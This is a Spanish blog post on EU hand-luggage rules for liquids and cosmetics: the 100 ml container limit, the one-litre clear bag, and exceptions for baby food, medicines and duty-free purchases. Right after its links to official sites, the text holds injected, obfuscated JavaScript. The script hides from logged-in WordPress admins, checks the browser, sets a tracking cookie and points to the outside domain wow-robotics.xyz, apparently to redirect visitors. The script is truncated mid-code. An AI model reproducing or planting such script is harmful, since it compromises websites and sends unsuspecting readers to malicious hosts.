Llegó el día, nos vamos de viaje. Nos disponemos a preparar maletas, neceseres y todo lo necesario para pasar unos días fuera. Pero creo que no me equivoco si pienso que más de una de nosotras se echa a temblar segundos antes de pasar por la aduana, pensando quizás que su perfume favorito o ese neceser con su maquillaje va a terminar en los contenedores de basura del aeropuerto ¿verdad? ¿sabemos qué cantidad y los productos que podemos pasar en nuestro equipaje de mano?.

A día de hoy, y por seguridad, las normas son muy estrictas en este aspecto, pero no todo está prohibido. Veréis que  podéis llevar infinidad de productos simplemente cumpliendo unas normas básicas.

Si váis a facturar vuestro equipaje, no tendría por qué haber ningún problema, podéis llevar todo lo necesario (incluyendo líquidos de cualquier tamaño). Simplemente deberéis de tener cuidado y cerrar bien los frascos para que el líquido no se derrame durante el viaje (podéis utilizar bolsas de plástico para evitarlo).

El problema viene cuando no facturamos nuestro equipaje y lo llevamos con nosotros en la cabina del avión. En este caso debemos cumplir unas normas un poco más estrictas pero sencillas.

La normativa europea nos deja llevar un máximo de un litro de líquido en nuestro equipaje de mano. Pero cuidado!! Los frascos deberán ser de capacidad máxima de 100ml. Esto quiere decir que si nuestro perfume supera esta medida, no tendrán contemplaciones a la hora de tirarlo a la basura al pasar el control. Sí que podríamos llevar 10 frascos de perfume de 100ml,  o incluso 20 frascos de 50ml y así hasta alcanzar la medida total de 1 litro, estas medidas sirven tanto para líquidos, como para aerosoles o geles. Así mismo, deberemos de introducirlos en una bolsa de plástico transparente de las que tienen Zip (para poder abrirla y cerrarla sin problemas), las podéis encontrar en supermercados.

Con nuestros productos de cosmética debemos de seguir las mismas normas, así que podremos llevar labiales, maquillajes y otros productos siempre y cuando no superen los 100ml.

Los aeropuertos hacen excepciones con los líquidos necesarios para consumir durante el viaje, como pueden ser leche para lactantes, medicinas o los típicos “potitos” que haya que darle al bebé durante el viaje. Este tipo de productos, aunque superen la cantidad de 100ml, están permitidos (previa supervisión de las personas destinadas para ello).
También podéis pasar líquidos que hayáis comprado en las tiendas del aeropuerto como pueden ser botellas de alcohol sin problemas, siempre y cuando estén sellados y sin abrir.
Si deseáis información adicional sobre esta normativa comunitaria, podéis entrar en la página: http://eur-lex.europa.eu/es/index.htm, www.mfom.es, y en www.aena.es var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone